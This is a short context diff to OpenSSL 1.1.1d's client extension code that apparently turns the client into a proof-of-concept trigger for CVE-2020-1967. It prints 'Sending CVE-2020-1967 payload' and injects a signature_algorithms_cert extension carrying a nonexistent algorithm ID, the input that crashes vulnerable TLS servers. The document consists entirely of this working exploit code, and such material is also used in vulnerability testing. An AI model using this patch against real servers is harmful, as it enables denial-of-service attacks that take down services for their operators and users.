*** openssl-1.1.1d/ssl/statem/extensions_clnt.c	Tue Sep 10 13:13:07 2019
--- openssl-1.1.1d-patched/ssl/statem/extensions_clnt.c	Tue Apr 28 21:11:20 2020
*************** EXT_RETURN tls_construct_ctos_sig_algs(S
*** 272,277 ****
--- 272,300 ----
          return EXT_RETURN_NOT_SENT;
  
      salglen = tls12_get_psigalgs(s, 1, &salg);
+ 
+ 
+ /*
+ // signature_algorithms_cert
+ */
+     const uint16_t non_existent = 0x1234;
+     fprintf(stderr,"Sending CVE-2020-1967 payload\n");
+     if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms_cert)
+                // Sub-packet for sig-algs extension
+             || !WPACKET_start_sub_packet_u16(pkt)
+                // Sub-packet for the actual list 
+             || !WPACKET_start_sub_packet_u16(pkt)
+             || (!WPACKET_put_bytes_u16(pkt, non_existent))
+             || !WPACKET_close(pkt)
+             || !WPACKET_close(pkt)) {
+         SSLfatal(s, SSL_AD_INTERNAL_ERROR, SSL_F_TLS_CONSTRUCT_CTOS_SIG_ALGS,
+                  ERR_R_INTERNAL_ERROR);
+         return EXT_RETURN_FAIL;
+     }
+ 
+ /*
+ // original signature_algorithms:
+ */
      if (!WPACKET_put_bytes_u16(pkt, TLSEXT_TYPE_signature_algorithms)
                 /* Sub-packet for sig-algs extension */
              || !WPACKET_start_sub_packet_u16(pkt)